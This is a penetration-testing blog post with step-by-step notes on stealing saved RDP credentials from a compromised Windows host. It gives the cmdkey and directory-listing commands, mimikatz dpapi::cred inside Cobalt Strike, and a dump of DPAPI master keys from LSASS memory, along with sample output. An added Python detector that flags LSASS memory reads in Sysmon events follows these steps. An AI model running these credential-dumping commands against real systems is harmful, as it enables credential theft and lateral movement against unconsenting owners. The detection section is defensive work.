[Intranet penetration] Retrieving saved RDP credentials from a remote host

These are working notes only, without detailed explanation.

Windows stores saved RDP credentials in this directory:

C:\Users\<username>\AppData\Local\Microsoft\Credentials

They can be listed from the command line with either of:

cmdkey /list

or

powerpick Get-ChildItem C:\Users\Administrator\AppData\Local\Microsoft\Credentials\ -Force

Note: cmdkey /list must be run inside the user's logon session; when run as SYSTEM it returns nothing.

With mimikatz inside Cobalt Strike, the guidMasterKey and pbData of a credential blob can be read out:

mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID

The output looks like this:

**BLOB**
  dwVersion : 00000001 - 1
  guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}
  dwFlags : 20000000 - 536870912 (system ; )
  dwDescriptionLen : 00000012 - 18
  szDescription : 本地凭据数据

  algCrypt : 00006610 - 26128 (CALG_AES_256)
  dwAlgCryptLen : 00000100 - 256
  dwSaltLen : 00000020 - 32
  pbSalt : 726d845b8a4eba29875****10659ec2d5e210a48f
  dwHmacKeyLen : 00000000 - 0
  pbHmackKey :
  algHash : 0000800e - 32782 (CALG_SHA_512)
  dwAlgHashLen : 00000200 - 512
  dwHmac2KeyLen : 00000020 - 32
  pbHmack2Key : cda4760ed3fb1c7874****28973f5b5b403fe31f233
  dwDataLen : 000000c0 - 192
  pbData : d268f81c64a3867cd7e96d99578295ea55a47fcaad5f7dd6678989117fc565906cc5a8bfd37137171302b34611ba5****e0b94ae399f9883cf80050f0972693d72b35a9a90918a06d
  dwSignLen : 00000040 - 64
  pbSign : 63239d3169c99fd82404c0e230****37504cfa332bea4dca0655

The fields that matter are guidMasterKey and pbData: pbData is the encrypted data we need to decrypt, and guidMasterKey identifies the master key required to decrypt it.

LSASS holds this master key in its cache, so with SeDebugPrivilege it can be read out:

beacon> mimikatz !sekurlsa::dpapi

[00000001]
     * GUID : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}
     * Time : 2020/1/3 8:05:02
     * MasterKey : 02b598c2252fa5d8f7fcd***7737644186223f44cb7d958148
     * sha1(key) : 3e6dc57a0fe****a902cfaf617b1322
[00000002]
     * GUID : {edcb491a-91d7-4d98-a714-8bc60254179f}
     * Time : 2020/1/3 8:05:02
     * MasterKey : c17a4aa87e9848e9f46c8ca81330***79381103f4137d3d97fe202
     * sha1(key) : 5e1b3eb1152d3****6d3d6f90aaeb

Then, with the credential file copied to the local machine, decrypt it using the master key whose GUID matches the blob's guidMasterKey:

mimikatz "dpapi::cred /in:C:\Users\USERNAME\Desktop\test\SESSION /masterkey:<MasterKey matching the GUID>"
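The step that exposes the master key above is a read of LSASS memory, which is also the point where a defender can catch it. The following is an added detection example, not part of the original post: it assumes Sysmon Event ID 10 (ProcessAccess) records flattened into "key: value|key: value" lines, uses constructed sample records, and flags any non-allowlisted process that opened lsass.exe with PROCESS_VM_READ in GrantedAccess.

```python
# Process access rights from winnt.h; reading LSASS memory requires PROCESS_VM_READ.
PROCESS_VM_READ = 0x0010

# Hypothetical allowlist of images that routinely open lsass.exe; tune per environment.
ALLOWLIST = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}

# Constructed Sysmon Event ID 10 records (not real telemetry), flattened to one line each.
SAMPLE_EVENTS = [
    "SourceImage: C:\\Windows\\System32\\csrss.exe|TargetImage: C:\\Windows\\System32\\lsass.exe|GrantedAccess: 0x1FFFFF",
    "SourceImage: C:\\Users\\alice\\Desktop\\untrusted.exe|TargetImage: C:\\Windows\\System32\\lsass.exe|GrantedAccess: 0x1010",
    "SourceImage: C:\\Windows\\System32\\svchost.exe|TargetImage: C:\\Windows\\System32\\notepad.exe|GrantedAccess: 0x1410",
    "SourceImage: C:\\Program Files\\AV\\scanner.exe|TargetImage: C:\\Windows\\System32\\lsass.exe|GrantedAccess: 0x1400",
]


def parse_event(line: str) -> dict:
    """Split a flattened ProcessAccess record into a field dictionary."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition(": ")
        fields[key.strip()] = value.strip()
    return fields


def suspicious_lsass_access(fields: dict) -> bool:
    """True when a non-allowlisted process opened lsass.exe with VM_READ rights."""
    target = fields.get("TargetImage", "").rsplit("\\", 1)[-1].lower()
    if target != "lsass.exe":
        return False
    source = fields.get("SourceImage", "").rsplit("\\", 1)[-1].lower()
    if source in ALLOWLIST:
        return False
    granted = int(fields.get("GrantedAccess", "0x0"), 16)
    return bool(granted & PROCESS_VM_READ)


def find_lsass_readers(lines) -> list:
    """Return (SourceImage, GrantedAccess) for every record that trips the rule."""
    hits = []
    for line in lines:
        fields = parse_event(line)
        if suspicious_lsass_access(fields):
            hits.append((fields["SourceImage"], int(fields["GrantedAccess"], 16)))
    return hits


if __name__ == "__main__":
    for src, acc in find_lsass_readers(SAMPLE_EVENTS):
        print(f"LSASS memory read by {src} (GrantedAccess=0x{acc:X})")
```

The scanner record is not flagged because 0x1400 carries no VM_READ bit, and csrss.exe is skipped by the allowlist; only the unknown desktop binary with 0x1010 is reported.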


Source: www.cnblogs.com/-mo-/p/12210302.html